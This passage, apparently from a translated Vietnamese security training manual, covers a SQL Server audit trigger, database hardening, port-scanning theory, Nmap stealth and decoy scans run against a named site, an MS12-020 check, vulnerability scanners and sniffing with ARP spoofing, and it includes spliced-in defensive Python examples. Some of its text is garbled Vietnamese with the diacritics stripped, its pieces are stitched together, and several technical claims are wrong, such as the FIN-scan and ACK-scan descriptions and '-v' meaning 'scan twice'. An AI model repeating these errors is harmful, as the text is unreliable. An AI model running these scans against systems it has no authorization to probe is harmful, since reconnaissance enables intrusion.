            + ' or (i.' + @fieldname + ' is null and d.' + @fieldname + ' is not null)'
            + ' or (i.' + @fieldname + ' is not null and d.' + @fieldname + ' is null)'
        EXEC (@sql)
    END
END
GO
The code above works perfectly: it goes into the system catalog and finds all the tables in the schema, then creates each trigger according to a fixed template. Restrict the tables or columns by customizing this code.
Note: this code runs on Microsoft SQL Server and uses triggers; adapt it for other databases. It cannot be done on databases that do not support triggers.
Benefit: the approach goes through only one table, which brings convenience and ease of administration; if the system keeps spawning new tables, that is not a problem.
Drawback: a little on the performance side. For medium and small databases auditing is no problem, but if the database is large, many Insert and Delete statements will generate enormous data for each row (since it stores one field per audit row).
For any database, large or small, if you only track the Update action this is the best approach. For Delete, customize the code to use the minimum set of fields that need tracking, or apply the second logging method based on this code.
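As an added example, not part of the original post, the following Python function reproduces what the INSERT generated by the trigger above does for one statement: a full outer join of inserted and deleted on the primary key, the <col=value> PK string, and one Audit row per field whose value differs or is NULL on only one side. The trigtest table, user names, and timestamps are constructed for the example.

```python
from datetime import datetime

# Primary-key columns per table; the trigger reads these from
# INFORMATION_SCHEMA.KEY_COLUMN_USAGE. Constructed for the example.
PK_COLUMNS = {"trigtest": ("i", "j")}


def _text(value):
    # Audit stores varchar: NULL stays NULL, anything else becomes text.
    return None if value is None else str(value)


def audit_rows(table, inserted, deleted, user, when):
    """One Audit row per changed field for a single statement.
    inserted/deleted play the role of SQL Server's pseudo-tables
    (lists of dicts, one dict per row)."""
    pk_cols = PK_COLUMNS.get(table)
    if not pk_cols:
        raise ValueError(f"no PK on table {table}")       # RAISERROR in the trigger
    kind = "U" if inserted and deleted else ("I" if inserted else "D")
    stamp = when.strftime("%Y%m%d %H:%M:%S")               # CONVERT(..,112) + CONVERT(..,114)

    def key(row):
        return tuple(row[c] for c in pk_cols)

    ins = {key(r): r for r in inserted}
    dele = {key(r): r for r in deleted}
    rows = []
    for k in sorted(ins.keys() | dele.keys()):             # full outer join on the PK
        i, d = ins.get(k), dele.get(k)
        pk = "".join(f"<{c}={v}>" for c, v in zip(pk_cols, k))   # the @PKSelect string
        for col in (i or d):
            old = _text(d.get(col)) if d else None
            new = _text(i.get(col)) if i else None
            # same test as the generated WHERE clause: values differ,
            # or the value is NULL on exactly one side
            if old != new:
                rows.append((kind, table, pk, col, old, new, stamp, user))
    return rows


def demo_update():
    """Two rows updated: t set on (1,1), s changed on (2,1). Constructed data."""
    when = datetime(2012, 6, 1, 9, 30, 0)
    deleted = [{"i": 1, "j": 1, "s": "a", "t": None},
               {"i": 2, "j": 1, "s": "b", "t": "x"}]
    inserted = [{"i": 1, "j": 1, "s": "a", "t": "new"},
                {"i": 2, "j": 1, "s": "B", "t": "x"}]
    return audit_rows("trigtest", inserted, deleted, "alice", when)


def demo_delete():
    """One row deleted; a NULL column yields no audit row. Constructed data."""
    when = datetime(2012, 6, 1, 9, 31, 0)
    deleted = [{"i": 3, "j": 0, "s": None, "t": "z"}]
    return audit_rows("trigtest", [], deleted, "bob", when)


if __name__ == "__main__":
    for row in demo_update() + demo_delete():
        print(row)
```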

3. Database security methods

Basic security structure
Businesses today seem to concentrate too much on individual security components and forget the overall picture: without a basic security organization, any security policy will fail.
System administrators often manage security according to their own wishes, with little or no oversight from higher management. This raises questions:
Who makes sure the system administrator follows the security guidelines?
How does an organization make sure that all system administrators have applied the latest patches?
What does an organization rely on to be sure the latest patch has been tested and will not itself cause damage to the system?
Who verifies security for the whole corporation or for each company?

[Figure: an effective network security organization]

Even with a suitable structure, you will still run into confusion in matters as important as security. This confusion causes no small upheaval, for instance:
Jim at the east coast office has applied all the patches, but he has an insecure link to Bill on the west coast, who failed to configure the firewall properly. And that alone is enough for a full-scale destructive attack.
Faced with such cases, you need to review everything when setting up the basic security structure.
Now, having a basic security organization for the system, we will start to examine the technical issues of database security.
Database vulnerabilities (asking for a security war!)
Database security can basically be attacked in the following areas:

- Server security
- Database connections
- Table access control
- Restricting database access
Server security
Server security is the program that limits actual access to the database service. This is the most important aspect of security, and you should plan it carefully.
Its basic idea is: you cannot access what you cannot see. This is not a web server and it should not be an anonymous connection either. When you need to provide data for dynamic web pages, your database should not sit on the same machine as the web server. That is not only for security but also good for performance. If the database serves the web server, configure it to accept connections only from that web server.

Access from trusted IP addresses: limit the database service to answering only requests that come from the known web server IP.
Trusted IP addresses
Each server should be configured to allow contact only with trusted IP addresses. Just as at home you do not let your children talk to strangers, here too you should know exactly who is allowed to talk to the database server.
If the back end is a web server, only the web server's address should be allowed to access the database server. If the database server supplies data to a main application running on the internal network, restrict the addresses to the internal network only.
Do not keep weakly protected web databases on the same server as internal database information.
Database connections
Dynamic applications today are becoming the reason many people update the database directly without validation. If you allow users to update the database through a web page, make sure the update is safe. With SQL, for instance, an ordinary user must never be able to enter data that has not been checked.
If you need to use an ODBC connection, make sure only a few users have access to the shared file. Has every employee in your company ever been given the keys to every room in the company? So never let user accounts use every connection and data source on the server.
Table access control
Table access control is one of the most overlooked forms of database security, because it is very hard to inherit and apply. Using table access control properly requires cooperation between the system administrator and the database developer, and we all know that cooperation is a rare word in the IT industry.
Many users end up with access rights because the database system administrator left the level at public. Or, if a table is only used at the system level, why does it carry other access rights besides the admin right?
Unfortunately table structure, suitable relational databases, and development issues are beyond the scope of this article. Perhaps we will discuss them in more detail in a later article.
Restricting database access
This is the last item in the database security overview we are examining. The main issue in this item is system network access, focused on Internet databases. Most targets of attacks today are network-based databases; every web-based application has ports on which attackers can listen.
Cyber criminals now mostly use the simple form of port scanning to find the default open ports of popular database systems. "Default" is the word, because you can change the ports the service listens on, which is a good way to avoid attacks.
First they try to find out whether a machine with a specific address exists. They use the ping command, simply by opening a command window and typing the keyword ping, for example:
C:\ ping 127.0.0.1
or
root@localhost: ~$: ping 127.0.0.1
The reply may look like this:
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Example of the ping command

Cyber criminals today know very well how systems respond at these addresses. The first countermeasure is to disable ICMP packets. This also blocks the reply to a ping request.
There are many ways to block open Internet access. Every database system has its own unique set of components, as does every operating system. Just a few methods are given here:
Trusted IP addresses: UNIX services are configured to answer ping only from the hosts in the trusted host list. In UNIX this is fully implemented by configuring the rhosts file, which restricts server access to a list of specific users.
Disabling server accounts: if you suspend a server ID after 3 wrong passwords, you hold off an attack. Otherwise the attacker can run a program that generates millions of passwords until it guesses the right ID and password of a user.
Special features: you can use products such as RealSecure by ISS. It sends an alert whenever an outside service is trying to breach the security of your system.
Oracle databases have many authentication methods:
Kerberos security: this is the popular ticket that avoids having to use the basic authentication system.
Virtual private database (VPD): VPD technology can restrict access by selecting a number of rows of a column.
Grant-execute security: the privilege to execute a subprogram can be bound tightly to a user. When the user executes the subprogram, they are granted access to the database, but only within the scope of that subprogram.
Authentication services: security authentication services provide predetermined identification of external users.
Port access security: all Oracle applications listen directly on a specific port on the server. Like any standard HTTP service, the Oracle Web Listener can be configured to restrict access.

VI. NETWORK ASSESSMENT AND ANALYSIS TOOLS

1. Open port scanning skills
In this article I present the basic principles of port scanning on a system, the scanning techniques that let us know which ports a system is using. From these scanning concepts I also present solutions for preventing scans of the system. The article contains:
TCP/IP communication principles
Port scanning principles and methods
Using the Nmap software
a. TCP/IP communication principles
a.1. Structure of the TCP packet

In this article I focus only on the flag settings in the TCP packet that are used for port scanning:
- SYN: requests a connection between two machines
- ACK: answers that the connection between the two machines can begin
- FIN: ends the connection between the two machines
- RST: from the server, tells the client that this communication is refused (cannot be used)
- PSH: used in combination with URG
- URG: used to set the priority of this packet.
In fact each of these parameters in the packet is just a 1 or a 0: if it is 0 the TCP packet does not set the parameter, if it is 1 the parameter is set, and they occupy the 8 bits of the Flag field in turn.
a.2. The 3 steps that begin a TCP connection
+ Step I: the client sends the server a SYN packet
+ Step II: the server answers the client with a SYN/ACK packet
+ Step III: when the client receives the SYN/ACK packet it sends the server an ACK packet, and the exchange of data between the two machines begins.
a.3. The 4 steps that end a TCP connection
+ Step I: the client sends the server a FIN ACK packet
+ Step II: the server sends the client an ACK packet
+ Step III: the server sends the client a FIN ACK packet
+ Step IV: the client sends the server an ACK packet, and the disconnection between server and client is complete.
b. Port scanning principles on a system.
b.1. TCP scan
In the TCP/UDP packet there are 16 bits for the port number, which means there are ports from 1 to 65535. No hacker scans every port on a system; they only scan the most commonly used ports, usually ports 1 to 1024.
In the part above I presented the principles of opening and closing a connection between two machines on the network. Based on TCP's communication principles, I can scan which ports are open on a system with the following methods:
- SYN Scan: the client sends a SYN packet for a given port to the server; if the server returns SYN/ACK, the client knows that port on the server is open. If the server returns RST/SYN, I know that port on the server is closed.
- FIN Scan: the client has no connection to the server but still creates a FIN packet with a given port number and sends it to the server being scanned. If the server returns ACK, the client knows the server has that port open; if the server returns RST, the client knows the server has that port closed.
- NULL Scan Sure: the client sends the server TCP packets for the port being scanned with no flags set at all; if the server returns RST, I know that port on the server is closed.
- XMAS Scan Sorry: the client sends TCP packets for the port being scanned with several flags set, such as FIN, URG, PSH. If the server returns RST, I know that port on the server is closed.
- TCP Connect: this method is very practical; it sends the server real connection requests to specific ports on the server. If the server returns SYN/ACK, the client knows the port is open; if the server returns RST/ACK, the client knows that port on the server is closed.
- ACK Scan: this kind of scan aims to discover the access control lists on the server. The client tries to connect to the server with ICMP packets; if it receives a Host Unreachable message, the client understands that the port on the server is filtered.
There are a few scan types for typical services that are easy to attack, such as:
- RPC Scan: tries to check whether the system has a port open for the RPC service.
- Windows Scan: similar to the ACK Scan, but it can only be run against certain ports.
- FTP Scan: can be used to see whether the FTP service is in use on the server.
- IDLE: this is a passive scan; it sniffs and concludes which ports the machine has open. This method is accurate but sometimes incomplete, because there are ports on the machine that are open but carry no traffic, so this method cannot detect them.
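As an added example, not part of the original article, the flag values of section a.1 and the probe patterns of section b.1 can be turned into a defender-side detector: it reads constructed connection-log lines, classifies each segment by its flag byte, and reports any source that touched many distinct ports with the same probe type. The one-line log format, the sample addresses, and the threshold are assumptions of this example.

```python
import re
from collections import defaultdict

# TCP flag bits as they sit in the flag byte (section a.1 lists these six)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

# Probe patterns from section b.1, keyed by the exact set of flags
PROBE_TYPES = {
    0:               "NULL scan",           # no flag at all
    FIN:             "FIN scan",
    FIN | PSH | URG: "XMAS scan",
    SYN:             "SYN / connect scan",  # also the first packet of any normal connection
    ACK:             "ACK scan",
}

# Hypothetical one-line-per-segment log format, constructed for this example
LINE = re.compile(
    r"(?P<ts>\S+ \S+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) flags=0x(?P<flags>[0-9a-fA-F]{2})"
)

# Constructed sample: 10.0.0.5 sends bare NULL probes to six ports, 10.0.0.7 opens a
# normal connection (SYN, then a PSH/ACK data segment), 10.0.0.8 sends two XMAS probes.
SAMPLE_LOG = """\
2012-06-01 10:00:01 10.0.0.5:40001 -> 10.0.0.10:21 flags=0x00
2012-06-01 10:00:01 10.0.0.5:40002 -> 10.0.0.10:22 flags=0x00
2012-06-01 10:00:01 10.0.0.5:40003 -> 10.0.0.10:23 flags=0x00
2012-06-01 10:00:02 10.0.0.5:40004 -> 10.0.0.10:25 flags=0x00
2012-06-01 10:00:02 10.0.0.5:40005 -> 10.0.0.10:80 flags=0x00
2012-06-01 10:00:02 10.0.0.5:40006 -> 10.0.0.10:110 flags=0x00
2012-06-01 10:00:03 10.0.0.7:51000 -> 10.0.0.10:443 flags=0x02
2012-06-01 10:00:03 10.0.0.7:51000 -> 10.0.0.10:443 flags=0x18
2012-06-01 10:00:04 10.0.0.8:33000 -> 10.0.0.10:22 flags=0x29
2012-06-01 10:00:04 10.0.0.8:33001 -> 10.0.0.10:80 flags=0x29
"""


def classify(flags):
    """Map a flag byte to a probe type from section b.1, or None."""
    return PROBE_TYPES.get(flags & 0x3F)  # ignore the CWR/ECE bits above the six flags


def scan_report(lines, threshold=5):
    """Count distinct (destination, port) pairs per source and probe type and
    return those at or above threshold. A lone SYN is normal traffic; one
    source probing many ports with the same bare flag set is what stands out."""
    touched = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # unparseable line: skip it rather than crash the detector
        kind = classify(int(m["flags"], 16))
        if kind is not None:
            touched[(m["src"], kind)].add((m["dst"], int(m["dport"])))
    return {key: len(ports) for key, ports in touched.items() if len(ports) >= threshold}


def demo():
    return scan_report(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for (src, kind), count in demo().items():
        print(f"{src}: {kind} against {count} distinct ports")
```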
b.2. UDP Scan.
Whereas packets sent with TCP have guaranteed integrity and will always be delivered to their destination, packets sent with UDP meet the need for fast transfer of small packets. With TCP communication the attacker can easily scan which ports the system has open based on the flags in the TCP packet.
Structure of the UDP packet

As we can see, the UDP packet contains no flags, so the TCP port scanning methods cannot be used for UDP. Unfortunately most systems allow ICMP to be sent.
If a port is closed, when the server receives the ICMP packet from the client it will try to send back an ICMP type 3 code 3 (port unreachable) packet to the client. When doing a UDP scan, be prepared to receive results that are not very reliable.

Page | 215 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

c. Port scanning with Nmap.
Nmap is a very powerful port scanner that has long been famous and trusted by hackers. It supports every port scanning method, and beyond that it can scan for hostnames and the services running on a system.
Nmap now offers both a graphical interface and a command-line interface, and runs on both *NIX and Windows.
Nmap is free software; download it from: http://nmap.org/download.html
Below is Nmap's scan usage:
C:\nmap-3.93>nmap -h
Nmap 3.93 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service and app names/versions
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
-iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
--win_help Windows-specific features
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

Scan types supported by Nmap:
nmap -sT: the letter s stands for Scan and T for a TCP scan
nmap -sU: UDP scan
nmap -sP: Ping scan
nmap -sF: FIN scan
nmap -sX: XMAS scan
nmap -sN: NULL scan
nmap -sV: scan for the names of the applications and their versions
nmap -sR / -I: RPC scan
nmap -sT -p1-5000 -sV -O -T5 192.168.0.211
This command uses the TCP scan method on ports 1 to 5000, enables fingerprinting of services and the OS, and -T5 means a fast scan, against the machine 192.168.0.211.
Advanced options that combine with the scan types in Nmap:
- -O: used to learn the operating system running on the target; for example, to run an XMAS scan with Nmap and guess the operating system of www.tocbatdat.net, we use the command: nmap -sX -O www.tocbatdat.net.
- -p: restricts the range of ports to scan
- -F: only the ports in Nmap's own scan list
- -v: scan twice to increase the reliability and effectiveness of whichever scan method we use.
- -P0: do not ping the host; this aims to reduce the scan-blocking checks on websites or servers.
For example, to scan the website www.tocbatdat.net with a UDP scan over ports 1 to 1024, run it twice for better results, and not ping the site during the scan:
nmap -sU -p 1-1024 -v -P0 www.tocbatdat.net
Nmap also supports hidden scanning to avoid the scan checks on a server, for example:
-Ddecoy_host1,decoy2: hides the scan among decoys.
-6: scan over IPv6
Nmap also gives us options to output the results into many different file formats.
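The -oG option listed above writes grepable output, which is the format an administrator usually feeds into other tooling. The following is an added example, not code from the original document or from Nmap itself: it parses -oG host lines into an inventory of open ports per host and diffs that inventory against an approved-services baseline, so a scan of your own network flags services that should not be exposed. The scan text is a constructed sample that imitates the -oG layout (tab-separated "Key: value" fields; the Ports field holds comma-separated port/state/proto/owner/service/rpc/version/ entries), and the baseline dictionary is assumed.

```python
"""Parse Nmap grepable output (-oG) into an inventory of open ports per host,
then diff it against an approved-services baseline (added example)."""
import re

# One Ports: entry looks like "22/open/tcp//ssh//OpenSSH 5.3/"
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


def parse_grepable(text):
    """Return {host_ip: [ {port, state, proto, service, version}, ... ]}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):       # skip comment lines
            continue
        fields = {}
        for chunk in line.split("\t"):          # fields are tab-separated
            key, _, value = chunk.partition(":")
            fields[key.strip()] = value.strip()
        host = fields["Host"].split()[0]         # "192.168.0.211 ()" -> IP only
        ports = []
        for m in PORT_RE.finditer(fields.get("Ports", "")):
            port, state, proto, _owner, service, _rpc, version = m.groups()
            ports.append({"port": int(port), "state": state, "proto": proto,
                          "service": service, "version": version})
        hosts.setdefault(host, []).extend(ports)  # a host may span several lines
    return hosts


def open_ports(hosts):
    """Collapse the inventory to {host: sorted list of open port numbers}."""
    return {h: sorted(p["port"] for p in ps if p["state"] == "open")
            for h, ps in hosts.items()}


def unexpected_ports(hosts, baseline):
    """baseline: {host: set of allowed ports}. Returns {host: [open ports not allowed]}.
    A host missing from the baseline has no allowed ports, so everything is flagged."""
    out = {}
    for h, ports in open_ports(hosts).items():
        extra = [p for p in ports if p not in baseline.get(h, set())]
        if extra:
            out[h] = extra
    return out


# Constructed sample in -oG layout; not real scan output.
SAMPLE_OG = """\
# Nmap 6.01 scan initiated (constructed sample)
Host: 192.168.0.211 ()\tStatus: Up
Host: 192.168.0.211 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.3/, 80/open/tcp//http//Apache httpd 2.2.15/, 3389/open/tcp//ms-wbt-server///, 135/filtered/tcp//msrpc///\tIgnored State: closed (996)\tOS: Linux 2.6.X
Host: 192.168.0.194 ()\tPorts: 23/open/tcp//telnet//Microsoft Windows telnetd/\tIgnored State: closed (999)
"""

# Assumed baseline: only SSH and HTTP are approved on .211, nothing on .194.
BASELINE = {"192.168.0.211": {22, 80}}

if __name__ == "__main__":
    inventory = parse_grepable(SAMPLE_OG)
    for host, extra in unexpected_ports(inventory, BASELINE).items():
        print(f"{host}: unapproved open ports {extra}")
```

Run against a real file with `nmap -oG scan.txt ...` on a network you administer and pass the file contents to parse_grepable; filtered ports are kept in the inventory but are not counted as open.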
2. Scanning for OS vulnerabilities
a. Using Nmap to scan for OS vulnerabilities
Nmap uses a signature set for vulnerability scanning called the Nmap Script Engine. Each Nmap Script Engine file (.nse) scans for one kind of vulnerability.
Below I show how to scan for MS12-020, a vulnerability that allows a DoS attack that hangs Windows 7, 2008, Vista, XP and 2003 systems.
Step 1: search Google for "search ms12-020 by nmap"
Step 2: download the Nmap Script Engine file (.nse)
Step 3: install Nmap 6
Step 4: scan with the following nmap command (the .nse file is in the tocbatdat folder on drive E):
nmap -sC -p 3389 -v -v --script-trace --script "E:\\tocbatdat\\ms12-020-rev.nse" IP_Scan
Step 5: when Nmap reports as follows, the vulnerability is present
(The machine at IP 192.168.0.77 has the MS12-020 vulnerability; screenshot omitted in this copy)
In the same way we can use the Nmap Script Engine to scan for other vulnerabilities.
b. Using Nessus to scan for OS vulnerabilities
Nessus is a free and very effective scanner that can detect the vulnerabilities of most OSes, devices and applications.
Download Nessus from: http://www.nessus.org/products/nessus/select-your-operating-system
Installation:
After installation completes, log in to the console interface:
Click the "here" button to continue:
Click Get Started, then set the admin user and password for managing Nessus
Click Next to continue; if you do not have an Activation Code yet, click the register link:
Click Next to reach the plug-in download screen for Nessus
Downloading and installing the plug-ins
After installation completes, the login window appears
The management window after logging in to Nessus:
Before scanning, we first configure a Policy for the scan: click the Policy tab. By default the system ships with several policies such as Web App Test and PCI. Select the Internal Network Scan policy, choose Edit, and configure it to scan a Windows Server host. Set the scan parameters.
Choose to scan only the machine 192.168.0.194, using the Internal Policy (the policy we just edited).
After the policy is set, go to the Scan tab and add the host to scan:
Choose Launch Scan
Result after the scan completes: the system produces a report with the number of vulnerabilities, open ports, OS, services, the names of the vulnerabilities and how to remediate them.

Nessus really is a powerful and effective scanner, and it is free for personal use. Nessus uses a web interface, which is convenient for remote administration, and it also allows scans to be scheduled.
When an effective and free vulnerability scanning solution is needed, Nessus is the number one choice.
c. Using GFI to scan for OS vulnerabilities
GFI is a suite that can scan for, manage and patch vulnerabilities on Windows systems. Being a commercial tool, GFI is quite powerful and popular among solutions of this kind.
After installation, using GFI is similar to Nessus
Choose the Full Scan option
Click Scan and view the results
A strong point of GFI is that it can patch the vulnerabilities on the scanned machine if it has administrative rights.
3. Scanning for web vulnerabilities
The web is the most widespread service today and a great many applications are built on the web platform, but with it come a great many vulnerabilities in this service.
Web vulnerabilities can be divided into:
- Vulnerabilities in the OS
- Vulnerabilities in the web service (IIS, Apache)
- Vulnerabilities in the web application (SQL Injection, XSS, ...); these are the most common and are hard to discover without scanning tools.
a. Using Acunetix to scan for web vulnerabilities
Acunetix is a fast and effective scanner for the web service vulnerabilities seen today.
Installing Acunetix Scan
After successful installation, scan a website
Scan result for a website:
b. Lab: using IBM AppScan to scan for web vulnerabilities
4. Packet analysis and network sniffing techniques
a. The nature of sniffing
Sniffing is the process of converting the electrical signal into a digital one and then decoding it up through the higher layers to obtain the information needed.
On Windows, the WinPcap library performs this task.
On Linux, the LibPcap library performs this task.
Every tool has to use WinPcap or LibPcap to be able to decode packets from Layer 2 up to Layer 7.
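The decoding described here (Layer 2 up through Layer 4) and the flag combinations that the TCP scan types earlier in this section rely on, as an added example that is not part of the original document: a pure-Python parser for Ethernet/IPv4/TCP frames plus a small detection rule that names NULL, XMAS, bare-FIN and SYN probes, the kind of check an IDS applies to decoded packets. In practice the bytes would come from a WinPcap/libpcap capture (a .pcap file); here the frames are constructed inside the block by build_frame, with zero checksums because they never go on the wire.

```python
"""Decode a raw Ethernet frame to TCP and classify probe-style flag
combinations (NULL, XMAS, bare FIN, SYN) as a simple detection rule.
Added example; frames are constructed locally, not captured."""
import struct

ETH_HDR_LEN = 14
ETHERTYPE_IPV4 = 0x0800
PROTO_TCP = 6
# TCP flag bits (low byte of the data-offset/flags field)
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def decode_frame(frame):
    """Ethernet (L2) -> IPv4 (L3) -> TCP (L4). Returns a dict, or None when
    the frame is not IPv4/TCP or is truncated."""
    if len(frame) < ETH_HDR_LEN:
        return None
    dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:ETH_HDR_LEN])
    if ethertype != ETHERTYPE_IPV4:
        return None
    ip = frame[ETH_HDR_LEN:]
    if len(ip) < 20:
        return None
    (ver_ihl, _tos, _total, _ident, _frag, ttl, proto, _csum,
     src_ip, dst_ip) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    if ver_ihl >> 4 != 4:
        return None
    ihl = (ver_ihl & 0x0F) * 4                  # IP header length incl. options
    if proto != PROTO_TCP or len(ip) < ihl + 20:
        return None
    tcp = ip[ihl:]
    sport, dport, seq, ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4            # TCP header length incl. options
    flags = off_flags & 0x1FF
    return {"src_mac": mac_str(src_mac), "dst_mac": mac_str(dst_mac),
            "src_ip": ip_str(src_ip), "dst_ip": ip_str(dst_ip), "ttl": ttl,
            "sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": flags, "payload": tcp[data_off:]}


def classify_flags(flags):
    """Name the flag combinations the scan-type list uses as probes."""
    if (flags & 0x3F) == 0:
        return "NULL"                           # no flag at all
    if flags == (FIN | PSH | URG):
        return "XMAS"                           # FIN+PSH+URG "lit up"
    if flags == FIN:
        return "FIN"                            # FIN with no session behind it
    if flags == SYN:
        return "SYN"                            # ordinary connect / SYN scan
    return "normal"


def build_frame(src_ip, dst_ip, sport, dport, flags, payload=b""):
    """Construct a minimal Ethernet/IPv4/TCP frame for testing (checksums 0)."""
    eth = (bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb")
           + struct.pack("!H", ETHERTYPE_IPV4))
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1000, 0,
                      (5 << 12) | flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64,
                     PROTO_TCP, 0,
                     bytes(int(x) for x in src_ip.split(".")),
                     bytes(int(x) for x in dst_ip.split(".")))
    return eth + ip + tcp


def probe_report(frames):
    """Return (src_ip, dport, kind) for every frame that looks like a probe."""
    report = []
    for frame in frames:
        pkt = decode_frame(frame)
        if pkt is None:
            continue
        kind = classify_flags(pkt["flags"])
        if kind != "normal":
            report.append((pkt["src_ip"], pkt["dport"], kind))
    return report


# Constructed traffic: three probes from one host and one normal HTTP request.
SAMPLE_FRAMES = [
    build_frame("10.0.0.5", "10.0.0.10", 40000, 22, 0),
    build_frame("10.0.0.5", "10.0.0.10", 40000, 80, FIN | PSH | URG),
    build_frame("10.0.0.5", "10.0.0.10", 40000, 443, FIN),
    build_frame("10.0.0.7", "10.0.0.10", 51000, 80, PSH | ACK, b"GET / HTTP/1.0\r\n"),
]

if __name__ == "__main__":
    for entry in probe_report(SAMPLE_FRAMES):
        print("probe:", entry)
```

A real detector would also rate-limit (many distinct ports from one source in a short window) before alerting, since a single stray FIN can be a late segment from a closed connection rather than a scan.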

Page | 234 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

b. M hnh phn tch d liu chuyn nghip cho doanh nghip


Di y l mt m hnh tch hp gii php phn tch lung d liu, ng dng ca qu trnh
Sniffer.
D liu u tin c i qua thit b SSL Inspector (ton b traffic s c gii m) d liu
ca ngi dng vn khng b gin on. Ton b d liu s c gii m v nhn bn qua mt
port khc ca thit b.
Lung d liu c i vo thit b phn chia lung thng tin, nhng d liu cn thit s c
lc v phn tch trn thit b ny.
IDS phn tch cc nguy c an ninh mng
Forensic l thit b lu tr ton b bng thng mng v a ra cc bo co chi tit (dng nh
Wireshark nhng chi tit hn rt nhiu).

Page | 235 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

c. Mi trng Hub
Hub l mt Collision Domain nn vic capture traffic trn mng l hon ton d dng. i
vi nhng giao tip khng m ha th d dng c c thng tin.
d. K thut Sniffer trong mi trng Switch
Switch s dng MAC Address Table forward gi tin ti cc port c th.
NE-SW1#show mac address-table
          Mac Address Table
-------------------------------------------
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
 All    0100.0ccc.cccc    STATIC      CPU
 All    0100.0ccc.cccd    STATIC      CPU
 All    0180.c200.0000    STATIC      CPU
 All    0180.c200.0001    STATIC      CPU
 All    0180.c200.0002    STATIC      CPU
 All    0180.c200.0003    STATIC      CPU
 All    0180.c200.0004    STATIC      CPU
 All    0180.c200.0005    STATIC      CPU
 All    0180.c200.0006    STATIC      CPU
 All    0180.c200.0007    STATIC      CPU
 All    0180.c200.0008    STATIC      CPU
 All    0180.c200.0009    STATIC      CPU
 All    0180.c200.000a    STATIC      CPU
 All    0180.c200.000b    STATIC      CPU
 All    0180.c200.000c    STATIC      CPU
 All    0180.c200.000d    STATIC      CPU
 All    0180.c200.000e    STATIC      CPU
 All    0180.c200.000f    STATIC      CPU
 All    0180.c200.0010    STATIC      CPU

So a machine that wants to sniff in a switched environment has to do one of the following:
- Legitimate sniffing: configure Port Monitor on the switch; the traffic of whichever port or VLAN is to be monitored is copied to the monitor port.
- MAC spoofing: flood the switch's MAC address table (this approach is fairly hard).
- ARP spoofing: change the ARP table on the target machine and on the gateway.
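The defender's side of the ARP spoofing just listed, as an added example that is not part of the original document or of any tool it describes: a watcher that learns IP-to-MAC bindings from ARP replies and raises an alert when the gateway, or any previously seen host, suddenly "is-at" a different MAC, or when one MAC claims more IPs than a real host would. This is the same check that arpwatch-style monitors and switch features such as Dynamic ARP Inspection perform; the gateway address, the ARP records and the per-MAC limit are constructed for the example.

```python
"""ARP spoofing detector: track IP -> MAC bindings from ARP replies and alert
on binding changes and on one MAC claiming many IPs. Added example; the LAN
and the ARP records below are constructed."""
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"      # assumed gateway of the constructed LAN


class ArpWatcher:
    def __init__(self, gateway_ip=GATEWAY_IP, max_ips_per_mac=2):
        self.bindings = {}                  # ip -> mac last announced
        self.ips_by_mac = defaultdict(set)  # mac -> IPs it has claimed
        self.gateway_ip = gateway_ip
        self.max_ips_per_mac = max_ips_per_mac

    def observe(self, ts, opcode, sender_ip, sender_mac):
        """Feed one ARP packet (opcode 1 = request, 2 = reply).
        Returns the alerts it triggers (possibly an empty list)."""
        alerts = []
        if opcode != 2:                     # only replies carry "is-at" claims
            return alerts
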